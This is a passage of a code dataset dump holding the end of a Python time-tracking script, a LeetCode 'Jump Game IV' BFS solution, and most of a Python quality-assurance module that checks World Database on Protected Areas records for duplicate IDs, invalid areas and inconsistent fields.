seconds=seconds)\n print('Bye!')\n \n\nif __name__ == '__main__':\n args = arg_parser.parse_args()\n args.args = ' '.join(args.args)\n if args.debug:\n log_filename = 'timetracker.log'\n h = logging.FileHandler(log_filename)\n for thing in (logger, h):\n thing.setLevel(logging.DEBUG)\n logger.addHandler(h)\n logger.addHandler(logging.StreamHandler())\n for h in logger.handlers:\n h.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(threadName)s:%(message)s'))\n logger.info('Logging information to %s', log_filename)\n logger.handlers.pop()\n logger.debug('Args %r', args)\n main(args)\n logger.debug('Shut down')\n","repo_name":"waynew/whelps","sub_path":"timetrack.py","file_name":"timetrack.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72001394152","text":"'''\r\n Given an array of integers arr, you are initially positioned at the first index of the array.\r\n\r\nIn one step you can jump from index i to index:\r\n\r\ni + 1 where: i + 1 < arr.length.\r\ni - 1 where: i - 1 >= 0.\r\nj where: arr[i] == arr[j] and i != j.\r\nReturn the minimum number of steps to reach the last index of the array.\r\n\r\nNotice that you can not jump outside of the array at any time.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: arr = [100,-23,-23,404,100,23,23,23,3,404]\r\nOutput: 3\r\nExplanation: You need three jumps from index 0 --> 4 --> 3 --> 9. Note that index 9 is the last index of the array.\r\nExample 2:\r\n\r\nInput: arr = [7]\r\nOutput: 0\r\nExplanation: Start index is the last index. You don't need to jump.\r\nExample 3:\r\n\r\nInput: arr = [7,6,9,6,9,6,9,7]\r\nOutput: 1\r\nExplanation: You can jump directly from index 0 to index 7 which is last index of the array.\r\nExample 4:\r\n\r\nInput: arr = [6,1,9]\r\nOutput: 2\r\nExample 5:\r\n\r\nInput: arr = [11,22,7,7,7,7,7,7,7,22,13]\r\nOutput: 3\r\n \r\n\r\nConstraints:\r\n\r\n1 <= arr.length <= 5 * 10^4\r\n-10^8 <= arr[i] <= 10^8\r\n Hide Hint #1 \r\nBuild a graph of n nodes where nodes are the indices of the array and edges for node i are nodes i+1, i-1, j where arr[i] == arr[j].\r\n Hide Hint #2 \r\nStart bfs from node 0 and keep distance, answer is the distance when you reach onode n-1.\r\n\r\n\r\n'''\r\n\r\nclass Solution:\r\n def minJumps(self, arr) -> int:\r\n n = len(arr)\r\n if n <= 1:\r\n return 0\r\n\r\n graph = {}\r\n for i in range(n):\r\n if arr[i] in graph:\r\n graph[arr[i]].append(i)\r\n else:\r\n graph[arr[i]] = [i]\r\n\r\n curs = [0] # store layers from start\r\n visited = {0, n-1}\r\n step = 0\r\n\r\n other = [n-1] # store layers from end\r\n\r\n # when current layer exists\r\n while curs:\r\n # search from the side with fewer nodes\r\n if len(curs) > len(other):\r\n curs, other = other, curs\r\n nex = []\r\n\r\n # iterate the layer\r\n for node in curs:\r\n\r\n # check same value\r\n for child in graph[arr[node]]:\r\n if child in other:\r\n return step + 1\r\n if child not in visited:\r\n visited.add(child)\r\n nex.append(child)\r\n\r\n # clear the list to prevent redundant search\r\n graph[arr[node]].clear()\r\n\r\n # check neighbors\r\n for child in [node-1, node+1]:\r\n if child in other:\r\n return step + 1\r\n if 0 <= child < len(arr) and child not in visited:\r\n visited.add(child)\r\n nex.append(child)\r\n\r\n curs = nex\r\n step += 1\r\n\r\n return -1","repo_name":"Gangadharbhuvan/31_Days_Leetcode_Challenge-December","sub_path":"27.Jump_Game_IV/27.Jump_Game_IV.py","file_name":"27.Jump_Game_IV.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18729925840","text":"###################################################################################\n#### RAMBO: a Quality Assurance Tool for the World Database on Protected Areas ####\n#### Python script containing all quality assurance checks for the WDPA ####\n###################################################################################\n\n'''\nAuthor: Stijn den Haan\nSupervisor: Yichuan Shi\nBioinformatics internship • UNEP-WCMC • 10 June - 9 August 2019\n\nThis Python script contains all quality assurance checks for the WDPA that are part of RAQTOW.\nThese checks are subsequently called by the 'main' scripts poly.py and point.py, \nto execute the checks on the WDPA feature class attribute table provided.\n\n## Definitions ##\n\n**Offending fields** are WDPA fields (columns) that contain values that do not adhere to the rules set in the WDPA manual or\ndo not adhere to general logical rules, e.g. the marine area of the protected area being larger than the total protected area.\n- Offending fields are subdivided into several types:\n - *Duplicate*: records holding exactly the same values for all fields. Notably, the WDPA_PID field should not contain duplicates.\n - *Inconsistent*: multiple records (rows) about the same protected area (same WDPAID) contain conflicting field information\n - Example: records with the same `WDPAID` have different values present in field `NAME`, e.g. 'De Veluwe' vs 'De VeLUwe'.\n - *Invalid*: a record has an incorrect value for a particular field where only a particular set of values is allowed.\n - Example: `DESIG_TYPE` = 'Individual' while only 'National', 'International', and 'Regional' are allowed values for this field.\n - *Area invalid*: a record has an incorrect value for one or several area fields. \n - Example: `GIS_M_AREA` is larger than `GIS_AREA`.\n - *Forbidden character*: a record contains a field that has a forbidden character. These can affect downstream analyses on the WDPA.\n - Example: asterisk ('*') present in `NAME`.\n - *NaN values*: a record contains a field that is NA, NaN, or None, which can be the result of e.g. division by zero.\n\nIn this document, we use:\n- **field** to refer to a column of the database;\n - Example: `ISO3`\n- **value** to refer to each individual entry present in a field - i.e. the intersection of the field and row.\n - Example: 12345 present in field `WDPAID` on row 12\n'''\n\n###########################################\n##### 0. Load packages and WDPA fields ####\n###########################################\n\n#### Load packages ####\n\nimport numpy as np\nimport pandas as pd\nimport arcpy\nimport datetime\nimport os\nimport re\n\n#### Load fields present in the WDPA tables ####\n\n# Polygon data\n\nINPUT_FIELDS_POLY = ['WDPAID', 'WDPA_PID', 'PA_DEF', 'NAME', 'ORIG_NAME', 'DESIG', \n 'DESIG_ENG', 'DESIG_TYPE', 'IUCN_CAT', 'INT_CRIT', 'MARINE', 'REP_M_AREA', \n 'GIS_M_AREA', 'REP_AREA', 'GIS_AREA', 'NO_TAKE', 'NO_TK_AREA', 'STATUS', 'STATUS_YR', \n 'GOV_TYPE', 'OWN_TYPE', 'MANG_AUTH', 'MANG_PLAN', 'VERIF', 'METADATAID', 'SUB_LOC', \n 'PARENT_ISO3', 'ISO3', ]\n\n# Point data\n\nINPUT_FIELDS_PT = ['WDPAID', 'WDPA_PID', 'PA_DEF', 'NAME', 'ORIG_NAME', 'DESIG', \n 'DESIG_ENG', 'DESIG_TYPE', 'IUCN_CAT', 'INT_CRIT', 'MARINE', 'REP_M_AREA', \n 'REP_AREA', 'NO_TAKE', 'NO_TK_AREA', 'STATUS', 'STATUS_YR', 'GOV_TYPE', \n 'OWN_TYPE', 'MANG_AUTH', 'MANG_PLAN', 'VERIF', 'METADATAID', 'SUB_LOC', \n 'PARENT_ISO3', 'ISO3', ]\n\n# Source Table\n\nINPUT_FIELDS_META = ['METADATAID','DATA_TITLE','RESP_PARTY','VERIFIER','YEAR',\n 'UPDATE_YR', 'LANGUAGE','CHAR_SET','REF_SYSTEM', 'SCALE', \n 'LINEAGE', 'CITATION','DISCLAIMER', ]\n\n\n\n#####################################################\n#### 1. Convert ArcGIS table to pandas DataFrame ####\n#####################################################\n\n# Use this for the Polygons, Points, and the Source Table\n\n# Source: https://gist.github.com/d-wasserman/e9c98be1d0caebc2935afecf0ba239a0\ndef arcgis_table_to_df(in_fc, input_fields, query=''):\n '''\n Function will convert an arcgis table into a pandas DataFrame with an OBJECTID index, and the selected\n input fields using an arcpy.da.SearchCursor.\n For in_fc, specify the name of the geodatabase (.gdb) and feature class attribute table\n \n ## Arguments ##\n in_fc -- feature class attribute table - inside geodatabase - to import. \n Specify: /\n input_fields -- list of all fields that must be imported from the dataset\n query -- optional where_clause of arcpy.da.SearchCursor. Leave default for normal usage.\n\n ## Example ##\n arcgis_table_to_df(in_fc='WDPA_Jun2019_Public.gdb/WDPA_Jun2019_errortest',\n input_fields=input_fields_poly,\n query='')\n '''\n\n OIDFieldName = arcpy.Describe(in_fc).OIDFieldName # obtain OBJECTID field.\n final_fields = [OIDFieldName] + input_fields # Make a list of all fields that need to be extracted\n data = [row for row in arcpy.da.SearchCursor(in_fc,final_fields,where_clause=query)] # for all fields, obtain all rows\n fc_dataframe = pd.DataFrame(data,columns=final_fields) # Put data into pandas DataFrame\n fc_dataframe = fc_dataframe.set_index(OIDFieldName,drop=True) # set OBJECTID as index, but no longer use it as column\n fc_dataframe.replace('', np.nan, inplace=True) # set '' to np.nan\n\n return fc_dataframe\n\n\n#########################################\n##### 1.1 Obtain allowed ISO3 values ####\n#########################################\n\n# Download from GitHub and store in a pandas DataFrame\ncolumn_with_iso3 = ['alpha-3']\nurl = 'https://raw.githubusercontent.com/lukes/ISO-3166-Countries-with-Regional-Codes/master/all/all.csv'\niso3_df = pd.read_csv(url, usecols = column_with_iso3)\niso3 = np.append(iso3_df['alpha-3'].values, 'ABNJ')\n\n#######################################\n#### 2. Utility & hardcoded checks ####\n#######################################\n\n'''\nThe utility returns a subset of the WDPA DataFrame based on a list of WDPA_PIDs provided.\nThe hardcoded checks are not Factory Functions that can handle different inputs. Instead,\nthese are specific checks that have a set of input variables that cannot change.\n\n'''\n\n#############################################################################\n#### 2.0. Utility to extract rows from the WDPA, based on WDPA_PID input ####\n#############################################################################\n\ndef find_wdpa_rows(wdpa_df, wdpa_pid):\n '''\n Return a subset of DataFrame based on wdpa_pid list\n\n ## Arguments ##\n wdpa_df -- wdpa DataFrame\n wdpa_pid -- a list of WDPA_PIDs\n '''\n \n return wdpa_df[wdpa_df['WDPA_PID'].isin(wdpa_pid)]\n\n#######################################\n#### 2.1. Find duplicate WDPA_PIDs ####\n#######################################\n\ndef duplicate_wdpa_pid(wdpa_df, return_pid=False):\n '''\n Return True if WDPA_PID is duplicate in the DataFrame. \n Return list of WDPA_PID, if duplicates are present \n and return_pid is set True.\n '''\n\n if return_pid:\n ids = wdpa_df['WDPA_PID'] # make a variable of the field to find\n return ids[ids.duplicated()].unique() # return duplicate WDPA_PIDs\n\n return wdpa_df['WDPA_PID'].nunique() != wdpa_df.index.size # this returns True if there are WDPA_PID duplicates\n\n###########################################################################\n#### 2.2. Invalid: MARINE designation based on GIS_AREA and GIS_M_AREA ####\n###########################################################################\n\ndef area_invalid_marine(wdpa_df, return_pid=False):\n '''\n Assign a new 'MARINE' value based on GIS calculations, called marine_GIS_value\n Return True if marine_GIS_value is unequal to MARINE\n Return list of WDPA_PIDs where MARINE is invalid, if return_pid is set True\n '''\n \n # set min and max for 'coastal' designation (MARINE = 1)\n coast_min = 0.1\n coast_max = 0.9\n \n # create new column with proportion marine vs total GIS area \n wdpa_df['marine_GIS_proportion'] = wdpa_df['GIS_M_AREA'] / wdpa_df['GIS_AREA']\n \n def assign_marine_gis_value(wdpa_df):\n if wdpa_df['marine_GIS_proportion'] <= coast_min:\n return '0'\n elif coast_min < wdpa_df['marine_GIS_proportion'] < coast_max:\n return '1'\n elif wdpa_df['marine_GIS_proportion'] >= coast_max:\n return '2'\n \n # calculate the marine_value\n wdpa_df['marine_GIS_value'] = wdpa_df.apply(assign_marine_gis_value, axis=1)\n \n # find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[wdpa_df['marine_GIS_value'] != wdpa_df['MARINE']]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n############################################\n#### 2.3. Invalid: GIS_AREA >> REP_AREA ####\n############################################\n\ndef area_invalid_too_large_gis(wdpa_df, return_pid=False):\n '''\n Return True if GIS_AREA is too large compared to REP_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where GIS_AREA is too large compared to REP_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_AREA and REP_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n\n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large GIS_AREA\n\n # Compare GIS_AREA to REP_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['REP_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce column without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum allowed values for relative_size using mean and stdev\n max_gis = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_AREA to GIS_AREA\n relative_size = pd.Series((wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['REP_AREA'])\n\n # Find the rows with an incorrect GIS_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_gis) & (abs(wdpa_df['GIS_AREA']-wdpa_df['REP_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n############################################\n#### 2.4. Invalid: REP_AREA >> GIS_AREA ####\n############################################\n\ndef area_invalid_too_large_rep(wdpa_df, return_pid=False):\n '''\n Return True if REP_AREA is too large compared to GIS_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where REP_AREA is too large compared to GIS_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_AREA and REP_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n\n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large REP_AREA\n\n # Compare GIS_AREA to REP_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['GIS_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce Series without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum and minimum allowed values for relative_size using mean and stdev\n max_rep = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_AREA to GIS_AREA\n relative_size = pd.Series((wdpa_df['REP_AREA'] + wdpa_df['GIS_AREA']) / wdpa_df['GIS_AREA'])\n\n # Find the rows with an incorrect REP_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_rep) & (abs(wdpa_df['REP_AREA']-wdpa_df['GIS_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n################################################\n#### 2.5. Invalid: GIS_M_AREA >> REP_M_AREA ####\n################################################\n\ndef area_invalid_too_large_gis_m(wdpa_df, return_pid=False):\n '''\n Return True if GIS_M_AREA is too large compared to REP_M_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where GIS_M_AREA is too large compared to REP_M_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_M_AREA and REP_M_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n\n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large GIS_M_AREA\n\n # Compare GIS_M_AREA to REP_M_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['REP_M_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce column without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum and minimum allowed values for relative_size using mean and stdev\n max_gis = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_M_AREA to GIS_M_AREA\n relative_size = pd.Series((wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['REP_M_AREA'])\n\n # Find the rows with an incorrect GIS_M_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_gis) & (abs(wdpa_df['GIS_M_AREA']-wdpa_df['REP_M_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n################################################\n#### 2.6. Invalid: REP_M_AREA >> GIS_M_AREA ####\n################################################\n\ndef area_invalid_too_large_rep_m(wdpa_df, return_pid=False):\n '''\n Return True if REP_M_AREA is too large compared to GIS_M_AREA - based on thresholds specified below.\n Return list of WDPA_PIDs where REP_M_AREA is too large compared to GIS_M_AREA, if return_pid=True\n '''\n \n # Set maximum allowed absolute difference between GIS_M_AREA and REP_M_AREA (in km²)\n MAX_ALLOWED_SIZE_DIFF_KM2 = 50\n \n # Create two Series:\n # One to calculate the mean and stdev without outliers\n # One to use as index, to find WDPA_PIDs with a too large REP_M_AREA\n\n # Compare GIS_M_AREA to REP_M_AREA, replace outliers with NaN, then obtain mean and stdev\n # Settings\n calc = (wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['GIS_M_AREA']\n condition = [calc > 100,\n calc < 0]\n choice = [np.nan,np.nan]\n\n # Produce column without outliers\n relative_size_stats = pd.Series( \n np.select(condition, choice, default = calc))\n\n # Calculate the maximum and minimum allowed values for relative_size using mean and stdev\n max_rep = relative_size_stats.mean() + (2*relative_size_stats.std())\n\n # Series: compare REP_M_AREA to GIS_M_AREA\n relative_size = pd.Series((wdpa_df['REP_M_AREA'] + wdpa_df['GIS_M_AREA']) / wdpa_df['GIS_M_AREA'])\n\n # Find the rows with an incorrect REP_M_AREA\n invalid_wdpa_pid= wdpa_df[(relative_size > max_rep) & (abs(wdpa_df['REP_M_AREA']-wdpa_df['GIS_M_AREA']) > MAX_ALLOWED_SIZE_DIFF_KM2)]['WDPA_PID'].values\n\n if return_pid:\n return invalid_wdpa_pid\n\n return len(invalid_wdpa_pid) > 0\n\n#######################################################\n#### 2.7. Invalid: GIS_AREA <= 0.0001 km² (100 m²) ####\n#######################################################\n\ndef area_invalid_gis_area(wdpa_df, return_pid=False):\n '''\n Return True if GIS_AREA is smaller than 0.0001 km²\n Return list of WDPA_PIDs where GIS_AREA is smaller than 0.0001 km², if return_pid=True\n '''\n \n # Arguments\n size_threshold = 0.0001\n field_gis_area = 'GIS_AREA'\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[wdpa_df[field_gis_area] <= size_threshold]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#######################################################\n#### 2.8. Invalid: REP_AREA <= 0.0001 km² (100 m²) ####\n#######################################################\n\ndef area_invalid_rep_area(wdpa_df, return_pid=False):\n '''\n Return True if REP_AREA is smaller than 0.0001 km²\n Return list of WDPA_PIDs where REP_AREA is smaller than 0.0001 km², if return_pid=True\n '''\n \n # Arguments\n size_threshold = 0.0001\n field_rep_area = 'REP_AREA'\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[wdpa_df[field_rep_area] <= size_threshold]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n############################################################\n#### 2.9. Invalid: REP_M_AREA <= 0 when MARINE = 1 or 2 ####\n############################################################\n\ndef area_invalid_rep_m_area_marine12(wdpa_df, return_pid=False):\n '''\n Return True if REP_M_AREA is smaller than or equal to 0 while MARINE = 1 or 2\n Return list of WDPA_PIDs where REP_M_AREA is invalid, if return_pid=True\n '''\n \n # Arguments\n field = 'REP_M_AREA'\n field_allowed_values = 0\n condition_field = 'MARINE'\n condition_crit = ['1','2']\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[(wdpa_df[field] <= field_allowed_values) & (wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n##########################################################\n## 2.10. Invalid: GIS_M_AREA <= 0 when MARINE = 1 or 2 ###\n##########################################################\n\ndef area_invalid_gis_m_area_marine12(wdpa_df, return_pid=False):\n '''\n Return True if GIS_M_AREA is smaller than or equal to 0 while MARINE = 1 or 2\n Return list of WDPA_PIDs where GIS_M_AREA is invalid, if return_pid=True\n '''\n \n # Arguments\n field = 'GIS_M_AREA'\n field_allowed_values = 0\n condition_field = 'MARINE'\n condition_crit = ['1','2']\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[(wdpa_df[field] <= field_allowed_values) & (wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n########################################################\n## 2.11. Invalid: NO_TAKE, NO_TK_AREA and REP_M_AREA ####\n########################################################\n\ndef invalid_no_take_no_tk_area_rep_m_area(wdpa_df, return_pid=False):\n '''\n Return True if NO_TAKE = 'All' while the REP_M_AREA is unequal to NO_TK_AREA\n Return list of WDPA_PIDs where NO_TAKE is invalid, if return_pid=True\n '''\n\n # Select rows with NO_TAKE = 'All'\n no_take_all = wdpa_df[wdpa_df['NO_TAKE']=='All']\n \n # Select rows where the REP_M_AREA is unequal to NO_TK_AREA\n invalid_wdpa_pid = no_take_all[no_take_all['REP_M_AREA'] != no_take_all['NO_TK_AREA']]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n############################################################################\n## 2.12. Invalid: INT_CRIT & DESIG_ENG - non-Ramsar Site, non-WHS sites ####\n############################################################################\n\ndef invalid_int_crit_desig_eng_other(wdpa_df, return_pid=False):\n '''\n Return True if DESIG_ENG is something else than Ramsar Site (...)' or 'World Heritage Site (...)'\n while INT_CRIT is unequal to 'Not Applicable'. Other-than Ramsar / WHS should not contain anything\n else than 'Not Applicable'.\n Return list of WDPA_PIDs where INT_CRIT is invalid, if return_pid is set True\n '''\n \n # Arguments\n field = 'DESIG_ENG'\n field_allowed_values = ['Ramsar Site, Wetland of International Importance', \n 'World Heritage Site (natural or mixed)']\n condition_field = 'INT_CRIT'\n condition_crit = ['Not Applicable']\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[(~wdpa_df[field].isin(field_allowed_values)) & (~wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n \n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#########################################################################\n#### 2.13. Invalid: DESIG_ENG & IUCN_CAT - non-UNESCO, non-WHS sites ####\n#########################################################################\n\ndef invalid_desig_eng_iucn_cat_other(wdpa_df, return_pid=False):\n '''\n Return True if IUCN_CAT is unequal to the allowed values\n and DESIG_ENG is unequal to 'UNESCO-MAB (...)' or 'World Heritage Site (...)'\n Return list of WDPA_PIDs where IUCN_CAT is invalid, if return_pid is set True\n '''\n\n # Arguments\n field = 'IUCN_CAT'\n field_allowed_values = ['Ia',\n 'Ib',\n 'II',\n 'III',\n 'IV',\n 'V',\n 'VI',\n 'Not Reported',\n 'Not Assigned']\n condition_field = 'DESIG_ENG'\n condition_crit = ['UNESCO-MAB Biosphere Reserve', \n 'World Heritage Site (natural or mixed)']\n \n # Find invalid WDPA_PIDs\n invalid_wdpa_pid = wdpa_df[(~wdpa_df[field].isin(field_allowed_values)) & (~wdpa_df[condition_field].isin(condition_crit))]['WDPA_PID'].values\n\n if return_pid:\n return invalid_wdpa_pid\n \n return len(invalid_wdpa_pid) > 0\n\n#########################################################\n#### 3. Find inconsistent fields for the same WDPAID ####\n#########################################################\n\n#### Factory Function ####\n\ndef inconsistent_fields_same_wdpaid(wdpa_df, \n check_field, \n return_pid=False):\n '''\n Factory Function: this generic function is to be linked to\n the family of 'inconsistent' input functions stated below. These latter \n functions are to give information on which fields to check and pull \n from the DataFrame. This function is the foundation of the others.\n \n This function checks the WDPA for inconsistent values and \n returns a list of WDPA_PIDs that have invalid values for the specified field(s).\n\n Return True if inconsistent Fields are found for rows \n sharing the same WDPAID\n\n Return list of WDPA_PID where inconsistencies occur, if \n return_pid is set True\n\n ## Arguments ##\n check_field -- string of the field to check for inconsistency\n \n ## Example ##\n inconsistent_fields_same_wdpaid(\n wdpa_df=wdpa_df,\n check_field=\"DESIG_ENG\",\n return_pid=True): \n '''\n\n if return_pid:\n # Group by WDPAID to find duplicate WDPAIDs and count the \n # number of unique values for the field in question\n wdpaid_groups = wdpa_df.groupby(['WDPAID'])[check_field].nunique()\n\n # Select all WDPAID duplicates groups with >1 unique value for \n # specified field ('check_attributtes') and use their index to\n # return the WDPA_PIDs\n return wdpa_df[wdpa_df['WDPAID'].isin(wdpaid_groups[wdpaid_groups > 1].index)]['WDPA_PID'].values\n \n # Sum the number of times a WDPAID has more than 1 value for a field\n return (wdpa_df.groupby('WDPAID')[check_field].nunique() > 1).sum() > 0\n\t\n#### Input functions ####\n\n#################################\n#### 3.1. Inconsistent NAME #####\n#################################\n\ndef inconsistent_name_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'NAME'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n\n check_field = 'NAME'\n \n # The command below loads the factory function\n # and adds the check_field and return_pid arguments in it\n # to evaluate the wdpa_df for these arguments\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\t\n#####################################\n#### 3.2. Inconsistent ORIG_NAME ####\n#####################################\n\ndef inconsistent_orig_name_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'ORIG_NAME'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n\n check_field = 'ORIG_NAME'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#################################\t\n#### 3.3. Inconsistent DESIG ####\n#################################\n\ndef inconsistent_desig_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'DESIG'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'DESIG'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\t\n#####################################\n#### 3.4. Inconsistent DESIG_ENG ####\n#####################################\n\ndef inconsistent_desig_eng_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'DESIG_ENG'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'DESIG_ENG'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n######################################\n#### 3.5. Inconsistent DESIG_TYPE ####\n######################################\n\ndef inconsistent_desig_type_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'DESIG_TYPE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n \n check_field = 'DESIG_TYPE'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n\n####################################\n#### 3.6. Inconsistent INT_CRIT ####\n####################################\n\ndef inconsistent_int_crit_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'INT_CRIT'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n\n check_field = 'INT_CRIT'\n \n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n###################################\n#### 3.7. Inconsistent NO_TAKE ####\n###################################\n\ndef inconsistent_no_take_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'NO_TAKE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'NO_TAKE'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n##################################\n#### 3.8. Inconsistent STATUS ####\n##################################\n\ndef inconsistent_status_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'STATUS'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'STATUS'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#####################################\n#### 3.9. Inconsistent STATUS_YR ####\n#####################################\n\ndef inconsistent_status_yr_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'STATUS_YR'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'STATUS_YR'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#####################################\n#### 3.10. Inconsistent GOV_TYPE ####\n#####################################\n\ndef inconsistent_gov_type_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'GOV_TYPE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 'GOV_TYPE'\n\n return inconsistent_fields_same_wdpaid(wdpa_df, check_field, return_pid)\n\n#####################################\n#### 3.11. Inconsistent OWN_TYPE ####\n#####################################\n\ndef inconsistent_own_type_same_wdpaid(wdpa_df, return_pid=False):\n '''\n This function is to capture inconsistencies in the field 'OWN_TYPE'\n for records with the same WDPAID\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing field inconsistencies\n '''\n check_field = 